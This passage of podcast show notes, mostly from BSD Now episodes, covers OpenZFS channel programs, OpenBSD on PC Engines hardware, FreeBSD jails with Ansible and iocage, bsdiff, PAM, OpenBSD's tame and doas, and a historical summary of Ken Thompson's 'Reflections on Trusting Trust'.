Each administrative action needs to wait for the transaction group to flush, which under heavy loads could take multiple seconds. Now if you want to create AND set, you need to wait for two or three transaction groups. Meanwhile, during transaction group #101, the snapshot existed without the property set, which could cause all kinds of side effects. ZFS channel programs solve this by allowing you to perform a small scripted set of actions as a single atomic operation. In Delphix's appliance, they often needed to do as many as 15 operations together, which might take multiple minutes; with channel programs it is much faster and far safer, with fewer chances of side effects. BSDCan 2017 - Matt Ahrens: Building products based on OpenZFS, using channel programs -- Video Soon (http://www.bsdcan.org/2017/schedule/events/854.en.html) Software Is About Storytelling (http://bravenewgeek.com/software-is-about-storytelling/) Tyler Treat writes on the Brave New Geek blog: Software engineering is more a practice in archeology than it is in building. As an industry, we undervalue storytelling and focus too much on artifacts and tools and deliverables. How many times have you been left scratching your head while looking at a piece of code, system, or process? It's the story, the legacy left behind by that artifact, that is just as important—if not more—than the artifact itself. And I don't mean what's in the version control history—that's often useless. I mean the real, human story behind something. Artifacts, whether that's code or tools or something else entirely, are not just snapshots in time. They're the result of a series of decisions, discussions, mistakes, corrections, problems, constraints, and so on. They're the product of the engineering process, but the problem is they usually don't capture that process in its entirety. They rarely capture it at all. They commonly end up being nothing but a snapshot in time. It's often the sign of an inexperienced engineer when someone looks at something and says, "this is stupid" or "why are they using X instead of Y?" They're ignoring the context, the fact that circumstances may have been different. There is a story that led up to that point, a reason for why things are the way they are. If you're lucky, the people involved are still around. Unfortunately, this is not typically the case. And so it's not necessarily the poor engineer's fault for wondering these things. Their predecessors haven't done enough to make that story discoverable and share that context. I worked at a company that built a homegrown container PaaS on ECS. Doing that today would be insane with the plethora of container solutions available now. "Why aren't you using Kubernetes?" Well, four years ago when we started, Kubernetes didn't exist. Even Docker was just in its infancy. And it's not exactly a flick of a switch to move multiple production environments to a new container runtime, not to mention the politicking with leadership to convince them it's worth it to not ship any new code for the next quarter as we rearchitect our entire platform. Oh, and now the people behind the original solution are no longer with the company. Good luck! And this is on the timescale of about five years. That's maybe like one generation of engineers at the company at most—nothing compared to the decades or more software usually lives (an interesting observation is that timescale, I think, is proportional to the size of an organization). 
Don't underestimate momentum, but also don't underestimate changing circumstances, even on a small time horizon. The point is, stop looking at technology in a vacuum. There are many facets to consider. Likewise, decisions are not made in a vacuum. Part of this is just being an empathetic engineer. The corollary to this is you don't need to adopt every bleeding-edge tech that comes out to be successful, but the bigger point is software is about storytelling. The question you should be asking is how does your organization tell those stories? Are you deliberate or is it left to tribal knowledge and hearsay? Is it something you truly value and prioritize or simply a byproduct? Documentation is good, but the trouble with documentation is it's usually haphazard and stagnant. It's also usually documentation of how and not why. Documenting intent can go a long way, and understanding the why is a good way to develop empathy. Code survives us. There's a fantastic talk by Bryan Cantrill on oral tradition in software engineering (https://youtu.be/4PaWFYm0kEw) where he talks about this. People care about intent. Specifically, when you write software, people care what you think. As Bryan puts it, future generations of programmers want to understand your intent so they can abide by it, so we need to tell them what our intent was. We need to broadcast it. Good code comments are an example of this. They give you a narrative of not only what's going on, but why. When we write software, we write it for future generations, and that's the most underestimated thing in all of software. Documenting intent also allows you to document your values, and that allows the people who come after you to continue to uphold them. Storytelling in software is important. Without it, software archeology is simply the study of puzzles created by time and neglect. When an organization doesn't record its history, it's bound to repeat the same mistakes. A company's memory is composed of its people, but the fact is people churn. Knowing how you got here often helps you with getting to where you want to be. Storytelling is how we transcend generational gaps and the inevitable changing of the old guard to the new guard in a maturing engineering organization. The same is true when we expand that to the entire industry. We're too memoryless—shipping code and not looking back, discovering everything old that is new again, and simply not appreciating our lineage. Beastie Bits 1st BSD Users Stockholm Meetup (https://www.meetup.com/en-US/BSD-Users-Stockholm/) Absolute FreeBSD, 3rd Edition draft completed (https://blather.michaelwlucas.com/archives/3020) Absolute FreeBSD, 3rd Edition Table of Contents (https://blather.michaelwlucas.com/archives/2995) t2k17 Hackathon Report: My first time (Aaron Bieber) (https://undeadly.org/cgi?action=article;sid=20170824193521) The release of pfSense 2.4.0 will be slightly delayed to apply patches for vulnerabilities in 3rd party packages that are part of pfSense (https://www.netgate.com/blog/no-plan-survives-contact-with-the-internet.html) Feedback/Questions Ben writes in that zrepl is in ports now (http://dpaste.com/1XMJYMH#wrap) Peter asks us about Netflix on BSD (http://dpaste.com/334WY4T#wrap) meka writes in about dhclient exiting (http://dpaste.com/3GSGKD3#wrap) ***

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast

LDAP and STARTTLS https://isc.sans.edu/forums/diary/SSLTLS+on+port+389+Say+what/22135/ WordPress NextGEN Gallery Plugin SQL Injection Vulnerability https://blog.sucuri.net/2017/02/sql-injection-vulnerability-nextgen-gallery-wordpress.html Password Manager Insecurities https://team-sik.org/trent_portfolio/password-manager-apps/ Slack Insecure Cross Window Messaging https://labs.detectify.com/2017/02/28/hacking-slack-using-postmessage-and-websocket-reconnect-to-steal-your-precious-token/ Google Voice Recognition Used to Break Google ReCaptcha Audio Challenge https://east-ee.com/2017/02/28/rebreakcaptcha-breaking-googles-recaptcha-v2-using-google/

BSD Now
171: The APU - BSD Style!

BSD Now

Play Episode Listen Later Dec 7, 2016 87:13


Today on the show, we've got a look at running OpenBSD on an APU, some BSD in your Android, managing your own FreeBSD cloud service with Ansible and much more. Keep it tuned to your place to B...SD! This episode was brought to you by Headlines OpenBSD on PC Engines APU2 (https://github.com/elad/openbsd-apu2) A detailed walkthrough of building an OpenBSD firewall on a PC Engines APU2 It starts with a breakdown of the parts that were purchased, totalling around $200 Then the reader is walked through configuring the serial console, flashing the ROM, and updating the BIOS The next step is actually creating a custom OpenBSD install image, and pre-configuring its serial console. Starting with OpenBSD 6.0, this step is done automatically by the installer Installation: Power off the APU2 Insert the bootable OpenBSD installer USB flash drive into one of the USB slots on the APU2 Power on the APU2, press F10 to get to the boot menu, and choose to boot from USB (usually option number 1) At the boot> prompt, remember the serial console settings (see above) Also at the boot> prompt, press Enter to start the installer Follow the installation instructions The driver used for wireless networking is athn(4). It might not work properly out of the box. Once OpenBSD is installed, run fw_update with no arguments. It will figure out which firmware updates are required and will download and install them. When it finishes, reboot. Where the rubber meets the road… (part one) (https://functionallyparanoid.com/2016/11/29/where-the-rubber-meets-the-road-part-one/) A user describes their adventures installing OpenBSD and Arch Linux on a new Lenovo X1 Carbon (4th gen, Skylake) They also detail why they moved away from their beloved MacBook; while long, it describes a journey away from Apple that we've heard elsewhere. The journey begins with getting a new Windows laptop, shrinking the partition and creating space for a triple-boot install of Windows / Arch / OpenBSD. Brian then details how he set up the partitioning and performed the initial Arch installation, getting it tuned to his specifications. Next up was OpenBSD though, and that went sideways initially due to a new NVMe drive that wasn't fully supported (yet) The article is split into two parts (we will bring you the next installment at a future date), but he leaves us with the plan of attack to build a custom OpenBSD kernel with corrected PCI device identifiers. We wish Brian luck, and look forward to the "rest of the story" soon. *** Howto setup a FreeBSD jail server using iocage and ansible. (https://github.com/JoergFiedler/freebsd-ansible-demo) Setting up a FreeBSD jail server can be a daunting task. However, when a guide comes along which shows you how to do that, including not exposing a single (non-jailed) port to the outside world, you know we had to take a closer look. This guide comes to us from GitHub, courtesy of Joerg Fiedler. The project goals seem notable: Ansible playbook that creates a FreeBSD server which hosts multiple jails. Travis is used to run/test the playbook. No service on the host is exposed externally. All external connections terminate within a jail. Roles can be reused using Ansible Galaxy. Combine any of those roles to create a FreeBSD server that perfectly suits you. To get started, you'll need a machine with Ansible, Vagrant and VirtualBox, and your credentials to AWS if you want it to automatically create / destroy EC2 instances. 
There's already an impressive list of Ansible roles created for you to start with: freebsd-build-server - Creates a FreeBSD poudriere build server freebsd-jail-host - FreeBSD Jail host freebsd-jailed - Provides a jail freebsd-jailed-nginx - Provides a jailed nginx server freebsd-jailed-php-fpm - Creates a php-fpm pool and a ZFS dataset which is used as web root by php-fpm freebsd-jailed-sftp - Installs an SFTP server freebsd-jailed-sshd - Provides a jailed sshd server. freebsd-jailed-syslogd - Provides a jailed syslogd freebsd-jailed-btsync - Provides a jailed btsync instance server freebsd-jailed-joomla - Installs Joomla freebsd-jailed-mariadb - Provides a jailed MariaDB server freebsd-jailed-wordpress - Provides a jailed WordPress server. Since the machines have to be customized before starting, he mentions that cloud-init is used to do the following: activate the pf firewall; add a 'pass all keep state' rule to pf to keep track of connection states, which in turn allows you to reload the pf service without losing the connection; install the following packages: sudo, bash, python27; and allow passwordless sudo for user ec2-user. From there it is pretty straightforward, just a couple of commands to spin up the VMs either locally on your VirtualBox host, or in the cloud with AWS. Internally the VMs are auto-configured with iocage to create jails, where all your actual services run. A neat project, check it out today if you want a shake-n-bake type cloud + jail solution. Colin Percival's bsdiff helps reduce Android apk bandwidth usage by 6 petabytes per day (http://android-developers.blogspot.ca/2016/12/saving-data-reducing-the-size-of-app-updates-by-65-percent.html) A post on the official Android-Developers blog talks about how they used bsdiff (and bspatch) to reduce the size of Android application updates by 65% bsdiff was developed by FreeBSD's Colin Percival Earlier this year, we announced that we started using the bsdiff algorithm (by Colin Percival). Using bsdiff, we were able to reduce the size of app updates on average by 47% compared to the full APK size. This post is actually about the second generation of the code. Today, we're excited to share a new approach that goes further — File-by-File patching. App Updates using File-by-File patching are, on average, 65% smaller than the full app, and in some cases more than 90% smaller. Android apps are packaged as APKs, which are ZIP files with special conventions. Most of the content within the ZIP files (and APKs) is compressed using a technology called Deflate. Deflate is really good at compressing data but it has a drawback: it makes identifying changes in the original (uncompressed) content really hard. Even a tiny change to the original content (like changing one word in a book) can make the compressed output of deflate look completely different. Describing the differences between the original content is easy, but describing the differences between the compressed content is so hard that it leads to inefficient patches. So in the second generation of the code, they use bsdiff on each individual file, then package that, rather than diffing the original and new archives bsdiff is used in a great many other places, including shrinking the updates for the Firefox and Chrome browsers You can find out more about bsdiff here: http://www.daemonology.net/bsdiff/ A far more sophisticated algorithm, which typically provides roughly 20% smaller patches, is described in my doctoral thesis (http://www.daemonology.net/papers/thesis.pdf). 
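To see why deflate output is so hostile to naive diffing, here is a small sketch of the phenomenon (our own illustration, not code from bsdiff or the Android tooling): it compresses two buffers that differ by a single byte and counts how many compressed bytes differ. Link with -lz.

    /* deflate_diff.c -- flip one input byte, then compare the two
     * compressed outputs byte-for-byte. Everything downstream of the
     * change tends to diverge, because the bit alignment and LZ77
     * matches after the edit no longer line up. */
    #include <stdio.h>
    #include <zlib.h>

    #define INSIZE (64 * 1024)

    int
    main(void)
    {
        static unsigned char in1[INSIZE], in2[INSIZE];
        static unsigned char out1[2 * INSIZE], out2[2 * INSIZE];
        uLongf len1 = sizeof(out1), len2 = sizeof(out2);
        uLong i, n, diff = 0;

        /* mildly compressible data, identical except for one byte */
        for (i = 0; i < INSIZE; i++)
            in1[i] = in2[i] = (unsigned char)("abcdefgh"[i % 8] + (i / 512) % 16);
        in2[INSIZE / 2] ^= 1;

        if (compress(out1, &len1, in1, INSIZE) != Z_OK ||
            compress(out2, &len2, in2, INSIZE) != Z_OK)
            return 1;

        n = len1 < len2 ? len1 : len2;
        for (i = 0; i < n; i++)
            if (out1[i] != out2[i])
                diff++;
        printf("compressed %lu vs %lu bytes, %lu bytes differ\n",
            (unsigned long)len1, (unsigned long)len2, diff);
        return 0;
    }

Running something like this typically shows a large fraction of the compressed stream changing because of one flipped input byte, which is part of why File-by-File patching diffs the uncompressed contents of each file instead of the compressed archives.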
Considering the gains, it is interesting that no one has implemented Colin's more sophisticated algorithm. Colin had an interesting observation (https://twitter.com/cperciva/status/806426180379230208) last night: "I just realized that bandwidth savings due to bsdiff are now roughly equal to what the total internet traffic was when I wrote it in 2003." *** News Roundup DistroWatch does an in-depth review of NAS4Free (https://distrowatch.com/weekly.php?issue=20161114#nas4free) Jesse Smith over at DistroWatch has done a pretty in-depth review of NAS4Free. The review starts with mentioning that NAS4Free works on three platforms (ARM, i386, AMD64), and for the purposes of this review he would be using AMD64 builds. After going through the initial install (doing typical disk management operations, such as GPT/MBR, etc) he was ready to begin using the product. One concern originally observed was that the initial boot seemed rather slow. Investigation revealed this was due to it loading the entire OS image into memory, and the first (long) disk read did take some time, but once loaded it was super responsive. The next steps involved doing the initial configuration, which meant creating a new ZFS storage pool. After this process was done, he did find one puzzling UI option called "VM" which indicated it could be linked to VirtualBox in some way, but the docs didn't reveal how it is meant to be used. Additionally covered were some of the various "Access" methods, including traditional UNIX permissions, AD and LDAP, and then various Sharing services which are typical to a NAS, such as NFS, Samba and others. One neat feature was the built-in file browser via the web interface, which allows you another method of getting at your data when NFS, Samba or WebDAV aren't enough. Jesse gives us a nice round-up conclusion as well: Most of the NAS operating systems I have used in the past were built around useful features. Some focused on making storage easy to set up and manage, others focused on services, such as making files available over multiple protocols or managing torrents. Some strive to be very easy to set up. NAS4Free does pretty well in each of the above categories. It may not be the easiest platform to set up, but it's probably a close second. It may not have the prettiest interface for managing settings, but it is quite easy to navigate. NAS4Free may not have the most add-on services and access protocols, but I suspect there are more than enough of both for most people. Where NAS4Free does better than most other solutions I have looked at is security. I don't think the project's website or documentation particularly focuses on security as a feature, but there are plenty of little security features that I liked. NAS4Free makes it very easy to lock the text console, which is good because we do not all keep our NAS boxes behind locked doors. The system is fairly easy to upgrade and appears to publish regular security updates in the form of new firmware. NAS4Free makes it fairly easy to set up user accounts, handle permissions and manage home directories. It's also pretty straightforward to switch from HTTP to HTTPS and to block people not on the local network from accessing the NAS's web interface. All in all, I like NAS4Free. It's a good, general purpose NAS operating system. I did not feel the project did anything really amazing in any one category, nor did I run into any serious issues. The NAS ran as expected, was fairly straightforward to set up and easy to manage. 
This strikes me as an especially good platform for home or small business users who want an easy setup, some basic security and a solid collection of features. Browsix: Unix in the browser tab (https://browsix.org/) Browsix is a research project from the PLASMA lab at the University of Massachusetts, Amherst. The goal: Run C, C++, Go and Node.js programs as processes in browsers, including LaTeX, GNU Make, Go HTTP servers, and POSIX shell scripts. "Processes are built on top of Web Workers, letting applications run in parallel and spawn subprocesses. System calls include fork, spawn, exec, and wait." Pipes are supported with pipe(2), enabling developers to compose processes into pipelines. Sockets include support for TCP socket servers and clients, making it possible to run applications like databases and HTTP servers together with their clients in the browser. Browsix comprises two core parts: A kernel written in TypeScript that makes core Unix features (including pipes, concurrent processes, signals, sockets, and a shared file system) available to web applications. Extended JavaScript runtimes for C, C++, Go, and Node.js that support running programs written in these languages as processes in the browser. This seems like an interesting project, although I am not sure how it would be used as more than a toy *** Book Review: PAM Mastery (https://www.cyberciti.biz/reviews/book-review-pam-mastery/) nixCraft does a book review of Michael W. Lucas' "PAM Mastery" Linux, FreeBSD, and Unix-like systems are multi-user and need some way of authenticating individual users. Back in the old days, this was done in different ways: you needed to change each Unix application to use a different authentication scheme. Before PAM, if you wanted to use an SQL database to authenticate users, you had to write specific support for that into each of your applications. Same for LDAP, etc. So the Open Group led to the development of PAM for Unix-like systems. Today Linux, FreeBSD, Mac OS X and many other Unix-like systems are configured to use a centralized authentication mechanism called Pluggable Authentication Modules (PAM). The book "PAM Mastery" deals with the black magic of PAM. Of course, each OS chose to implement PAM a little bit differently. The book starts with the basic concepts about PAM and authentication. You learn about Multi-Factor Authentication and why to use PAM instead of changing each program to authenticate the user. The author went into great detail about why PAM is useful for developers and sysadmins. The examples cover CentOS Linux (RHEL and clones), Debian Linux, and FreeBSD. I like the way the author described PAM Configuration Files and Common Modules that cover everyday scenarios for the sysadmin. The PAM configuration file format and PAM Module Interfaces are discussed in easy-to-understand language. Control flags in PAM can be very confusing for new sysadmins. Modules can be stacked in a particular order, and the control flags determine how important the success or failure of a particular module is. There is also a chapter about using one-time passwords (Google Authenticator) for your application. The final chapter is all about enforcing good password policies for users and apps using PAM. The sysadmin would find this book useful as it covers a common authentication scheme that can be used with a wide variety of applications on Unix. You will master PAM topics and take control over authentication for your organization's IT infrastructure. 
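To make the "centralized mechanism" point concrete, here is a minimal sketch of a PAM client application, FreeBSD/OpenPAM flavour (the service name and conversation function here are illustrative choices, not taken from the book); link with -lpam:

    /* pam_check.c -- run a user through the "login" service's module
     * stack. Which modules run, and how their results combine, is
     * decided entirely by the PAM configuration, not by this code.
     * Typically needs root to consult the password database. */
    #include <stdio.h>
    #include <security/pam_appl.h>
    #include <security/openpam.h>   /* openpam_ttyconv */

    int
    main(int argc, char *argv[])
    {
        struct pam_conv conv = { openpam_ttyconv, NULL };
        pam_handle_t *pamh;
        const char *user = argc > 1 ? argv[1] : "nobody";
        int ret;

        if (pam_start("login", user, &conv, &pamh) != PAM_SUCCESS)
            return 1;
        ret = pam_authenticate(pamh, 0);   /* walk the stacked modules */
        if (ret == PAM_SUCCESS)
            ret = pam_acct_mgmt(pamh, 0);  /* account checks, e.g. expiry */
        printf("%s\n", ret == PAM_SUCCESS ? "authenticated" : "denied");
        pam_end(pamh, ret);
        return ret == PAM_SUCCESS ? 0 : 1;
    }

The payoff of the PAM design is that switching this program from local passwords to LDAP, an SQL database or one-time passwords requires no change to the code above, only to the stack of modules and control flags in the PAM configuration files.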
If you are a Linux or Unix sysadmin, I would highly recommend this book. Once again Michael W Lucas nailed it. The only book you may need for PAM deployment. Get "PAM Mastery" (https://www.michaelwlucas.com/tools/pam) *** Reflections on Trusting Trust - Ken Thompson, co-author of UNIX (http://www.win.tue.nl/~aeb/linux/hh/thompson/trust.html) Ken Thompson's "cc hack" - Presented in the journal Communications of the ACM, Vol. 27, No. 8, August 1984, in a paper entitled "Reflections on Trusting Trust", Ken Thompson, co-author of UNIX, recounted a story of how he created a version of the C compiler that, when presented with the source code for the "login" program, would automatically compile in a backdoor to allow him entry to the system. This is only half the story, though. In order to hide this trojan horse, Ken also added to this version of "cc" the ability to recognize if it was recompiling itself, to make sure that the newly compiled C compiler contained both the "login" backdoor and the code to insert both trojans into a newly compiled C compiler. In this way, the source code for the C compiler would never show that these trojans existed. The article starts off by talking about a contest to write a program that produces its own source code as output. Or rather, a C program that writes a C program that produces its own source code as output. The C compiler is written in C. What I am about to describe is one of many "chicken and egg" problems that arise when compilers are written in their own language. In this case, I will use a specific example from the C compiler. Suppose we wish to alter the C compiler to include the sequence "\v" to represent the vertical tab character. The extension to Figure 2 is obvious and is presented in Figure 3. We then recompile the C compiler, but we get a diagnostic. Obviously, since the binary version of the compiler does not know about "\v," the source is not legal C. We must "train" the compiler. After it "knows" what "\v" means, then our new change will become legal C. We look up on an ASCII chart that a vertical tab is decimal 11. We alter our source to look like Figure 4. Now the old compiler accepts the new source. We install the resulting binary as the new official C compiler and now we can write the portable version the way we had it in Figure 3. The actual bug I planted in the compiler would match code in the UNIX "login" command. The replacement code would miscompile the login command so that it would accept either the intended encrypted password or a particular known password. Thus if this code were installed in binary and the binary were used to compile the login command, I could log into that system as any user. Such blatant code would not go undetected for long. Even the most casual perusal of the source of the C compiler would raise suspicions. Next "simply add a second Trojan horse to the one that already exists. The second pattern is aimed at the C compiler. The replacement code is a Stage I self-reproducing program that inserts both Trojan horses into the compiler. This requires a learning phase as in the Stage II example. First we compile the modified source with the normal C compiler to produce a bugged binary. We install this binary as the official C. We can now remove the bugs from the source of the compiler and the new binary will reinsert the bugs whenever it is compiled. Of course, the login command will remain bugged with no trace in source anywhere. So now there is a trojan'd version of cc. 
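To make the bootstrapping ("training") step concrete, here is a small reconstruction in the spirit of the paper's Figures 3 and 4 (an illustration, not Thompson's actual code):

    /* Figure 3, the "portable" version: this only compiles once the
     * installed compiler binary already knows what '\v' means. */
    int
    escape(int c)
    {
        if (c == 'n') return '\n';
        if (c == 't') return '\t';
        if (c == 'v') return '\v';   /* chicken and egg */
        return c;
    }

    /* Figure 4, the "training" version used to bootstrap: */
    int
    escape_trained(int c)
    {
        if (c == 'n') return '\n';
        if (c == 't') return '\t';
        if (c == 'v') return 11;     /* vertical tab is ASCII 11 */
        return c;
    }

Once a compiler binary built from the Figure 4 source is installed, the source can be rewritten in the Figure 3 form and it will compile, because the knowledge now lives in the binary. The trojan horse works on exactly the same principle: once the binary "knows" the extra behaviour, the incriminating lines can be deleted from the source, and the binary will keep reinserting them.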
If you compile a clean version of cc, using the bad cc, you will get a bad cc. If you use the bad cc to compile the login program, it will have a backdoor. The source code for both backdoors no longer exists on the system. You can audit the source code of cc and login all you want; they will look trustworthy. The compiler you use to compile your new compiler is the untrustworthy bit, but you have no way to know it is untrustworthy, and no way to make a new compiler without using the bad compiler. The moral is obvious. You can't trust code that you did not totally create yourself. (Especially code from companies that employ people like me.) No amount of source-level verification or scrutiny will protect you from using untrusted code. In demonstrating the possibility of this kind of attack, I picked on the C compiler. I could have picked on any program-handling program such as an assembler, a loader, or even hardware microcode. As the level of program gets lower, these bugs will be harder and harder to detect. A well installed microcode bug will be almost impossible to detect. Acknowledgment: I first read of the possibility of such a Trojan horse in an Air Force critique of the security of an early implementation of Multics. I cannot find a more specific reference to this document. I would appreciate it if anyone who can supply this reference would let me know. Beastie Bits Custom made Beastie Stockings (https://www.etsy.com/listing/496638945/freebsd-beastie-christmas-stocking) Migrating ZFS from mirrored pool to raidz1 pool (http://ximalas.info/2016/12/06/migrating-zfs-from-mirrored-pool-to-raidz1-pool/) OpenBSD and you (https://home.nuug.no/~peter/blug2016/) Watson.org FreeBSD and Linux cross reference (http://fxr.watson.org/) OpenGrok (http://bxr.su/) FreeBSD SA-16:37: libc (https://www.freebsd.org/security/advisories/FreeBSD-SA-16:37.libc.asc) -- A 26+ year-old bug found in BSD's libc, all BSDs likely affected -- A specially crafted argument can trigger a static buffer overflow in the library, with the possibility of rewriting following static buffers that belong to other library functions. HardenedBSD issues correction for libc patch (https://github.com/HardenedBSD/hardenedBSD/commit/fb823297fbced336b6beeeb624e2dc65b67aa0eb) -- original patch improperly calculates how many bytes are remaining in the buffer. From December 27th until the 30th, the 33rd Chaos Communication Congress is going to take place in Hamburg, Germany. Think of it as the yearly gathering of the European hacker scene and their overseas friends. I am one of the people organizing the "BSD assembly (https://events.ccc.de/congress/2016/wiki/Assembly:BSD)" as a gathering place for BSD enthusiasts and waving the flag amidst all the other projects / communities. Feedback/Questions Chris - IPFW + Wifi (http://pastebin.com/WRiuW6nn) Jason - bhyve pci (http://pastebin.com/JgerqZZP) Al - pf errors (http://pastebin.com/3XY5MVca) Zach - Xorg settings (http://pastebin.com/Kty0qYXM) Bart - Wireless Support (http://pastebin.com/m3D81GBW) ***

BSD Now
99: BSD Gnow

BSD Now

Play Episode Listen Later Jul 22, 2015 79:15


This week we'll be talking with Ryan Lortie and Baptiste Daroussin about GNOME on BSD. Upstream development is finally treating the BSDs as first-class citizens, so we'll hear about how the recent porting efforts have been going. This episode was brought to you by Headlines OpenBSD presents tame (https://www.marc.info/?l=openbsd-tech&m=143725996614627&w=2) Theo de Raadt sent out an email detailing OpenBSD's new "tame" subsystem, written by Nicholas Marriott and himself, for restricting what processes can and can't do When using tame, programs will switch to a "restricted-service operating mode," limiting them to only the things they actually need to do As for the background: "Generally there are two models of operation. The first model requires a major rewrite of application software for effective use (ie. capsicum). The other model in common use lacks granularity, and allows or denies an operation throughout the entire lifetime of a process. As a result, they lack differentiation between program 'initialization' versus 'main servicing loop.' systrace had the same problem. My observation is that programs need a large variety of calls during initialization, but few in their main loops." Some initial categories of operation include: computation, memory management, read-write operations on file descriptors, opening of files and, of course, networking Restrictions can also be stacked further into the lifespan of the process, but removed abilities can never be regained (obviously) Anything that tries to access resources outside of its in-place limits gets terminated with a SIGKILL or, optionally, a SIGABRT (which can produce useful core dumps for investigation) Also included are 29 examples of userland programs that get additional protection with very minimal changes to the source - only 2 or 3 lines needing to be changed in the case of binaries like cat, ps, dmesg, etc. 
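To give a flavour of the model, here is a hypothetical sketch of how a daemon might use the interface; the header and flag names follow the initial posting and are assumptions on our part, since tame was explicitly still subject to change at recording time:

    /* tame_sketch.c -- hypothetical use of the proposed tame(2) */
    #include <sys/tame.h>   /* assumed header for the WIP interface */
    #include <err.h>
    #include <stdio.h>

    int
    main(void)
    {
        /* initialization phase, wide open: read config files,
         * resolve DNS, open log files, bind sockets, etc. */

        /* entering the main servicing loop: drop down to stdio
         * plus read-only filesystem access */
        if (tame(TAME_STDIO | TAME_RPATH) == -1)
            err(1, "tame");

        /* restrictions can be tightened further later, but never
         * relaxed; any disallowed access from here on kills the
         * process with SIGKILL (or SIGABRT for a core dump) */
        printf("restricted service loop runs here\n");
        return 0;
    }

This matches the 2-or-3-line diffs mentioned for cat, ps and dmesg: for most programs, the call simply slots in right after initialization.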
This is an initial work-in-progress version of tame, so there may be more improvements or further (https://www.marc.info/?l=openbsd-tech&m=143740834710502&w=2) control (https://www.marc.info/?l=openbsd-tech&m=143741052411159&w=2) options added before it hits a release (very specific access policies can sometimes backfire (https://forums.grsecurity.net/viewtopic.php?f=7&t=2522), however) The man page, also included in the mail, provides some specifics about how to integrate tame properly into your code (which, by design, was made very easy to do - making it simple means third party programs are more likely to actually use it) Kernel bits are in the tree now (https://www.marc.info/?l=openbsd-cvs&m=143727335416513&w=2), with userland changes starting to trickle in too Combined with a myriad of memory protections (http://www.bsdnow.tv/episodes/2015_05_13-exclusive_disjunction), tight privilege separation and (above all else (https://en.wikipedia.org/wiki/OpenBSD_security_features)) good coding practices, tame should further harden the OpenBSD security fortress Further discussion (https://news.ycombinator.com/item?id=9928221) can (https://www.reddit.com/r/programming/comments/3dsr0t) be (http://undeadly.org/cgi?action=article&sid=20150719000800&mode=flat) found (https://news.ycombinator.com/item?id=9909429) in (https://www.reddit.com/r/linux/comments/3ds66o) the (https://lobste.rs/s/tbbtfs) usual (https://www.reddit.com/r/openbsd/comments/3ds64c) places (https://www.reddit.com/r/BSD/comments/3ds681) you'd expect *** Using Docker on FreeBSD (https://wiki.freebsd.org/Docker) With the experimental Docker port landing in FreeBSD a few weeks ago, some initial docs are starting to show up This Docker is "the real thing," and isn't using a virtual machine as the backend - as such, it has some limitations The FreeBSD wiki has a page detailing how it works in general, as well as more info about those limitations When running Linux containers, it will only work as well as the Linux ABI compat layer for your version of FreeBSD (11.0, or -CURRENT when we're recording this, is where all the action is for 64bit support) For users on 10.X, there's also a FreeBSD container available, which allows you to use Docker as a fancy jail manager (it uses the jail subsystem internally) Give it a try and let us know how it compares to other solutions OpenBSD imports doas, removes sudo (http://www.tedunangst.com/flak/post/doas) OpenBSD has included the ubiquitous "sudo" utility for many years now, and the current maintainer of sudo (Todd C. Miller) is also a long-time OpenBSD dev The version included in the base system was much smaller than the latest current version used elsewhere, but was based on older code Some internal discussion led to the decision that sudo should probably be moved to ports now, where it can be updated easily and offer all the extra features that were missing in base (LDAP and whatnot) Ted Unangst conjured up a rewritten utility to replace it in the base system, dubbed "doas," with the aim of being simpler and more compact There were concerns that sudo was too big and too complicated, and a quick 'n' dirty check reveals that doas is around 350 lines of code, while sudo is around 10,000 - which would you rather have as a setuid root binary? 
After the initial import, a number of developers began reviewing and improving various bits here and there You can check out the code (http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/doas/) now if you're interested Command usage (http://www.openbsd.org/cgi-bin/man.cgi/OpenBSD-current/man1/doas.1) and config syntax (http://www.openbsd.org/cgi-bin/man.cgi/OpenBSD-current/man5/doas.conf.5) seem pretty straightforward More discussion (https://news.ycombinator.com/item?id=9914693) on HN *** What would you like to see in FreeBSD (https://www.reddit.com/r/freebsd/comments/3d80vt/what_would_you_like_to_see_in_freebsd/) Adrian Chadd started a reddit thread about areas in which FreeBSD could be improved, asking the community what they'd like to see There are over 200 comments that span a wide range of topics, so we'll just cover a few of the more popular requests - check the very long thread if you're interested in more The top comment says things don't "just work," citing failover link aggregation of LACP laggs, PPPoE issues, disorganized jail configuration options, unclear CARP configuration and userland dtrace being unstable Another common one was that there are three firewalls in the base system, with ipfilter and pf being kinda dead now - should they be removed, and more focus put into ipfw? Video drivers also came up frequently, with users hoping for better OpenGL support and support for newer graphics cards from Intel and AMD - similar comments were made about wireless chipsets as well Some other replies included more clarity with pkgng output, paying more attention to security issues, updating PF to match the one in OpenBSD, improved laptop support, a graphical installer, LibreSSL in base, more focus on embedded MIPS devices, binary packages with different config options, Steam support and lots more At least one user suggested better "marketing" for FreeBSD, with more advocacy and (hopefully) more business adoption That one really applies to all the BSDs, and regular users (that's you listening to this) can help make it happen for whichever ones you use right now Maybe Adrian can singlehandedly do all the work and make all the users happy *** Interview - Ryan Lortie & Baptiste Daroussin Porting the latest GNOME code to FreeBSD News Roundup Introducing resflash (http://stable.rcesoftware.com/resflash/) If you haven't heard of resflash before, it's "a tool for building OpenBSD images for embedded and cloud environments in a programmatic, reproducible way" One of the major benefits to images like this is the read-only filesystem, so there's no possibility of filesystem corruption if power is lost There's an optional read-write partition as well, used for any persistent changes you want to make You can check out the source code on GitHub (https://github.com/bconway/resflash) or read the main site for more info *** Jails with iocage (http://pid1.com/posts/post10.html) There are a growing number of FreeBSD jail management utilities: ezjail, cbsd, warden and a few others After looking at all the different choices, the author of this blog post eventually settled on iocage (https://github.com/iocage/iocage) for the job The post walks you through the basic configuration and usage of iocage for creating and managing jails If you've been unhappy with ezjail or some of the others, iocage might be worth giving a try instead (it also has really good ZFS integration) *** DragonFly GPU improvements (http://lists.dragonflybsd.org/pipermail/users/2015-July/207892.html) DragonFlyBSD continues to up their 
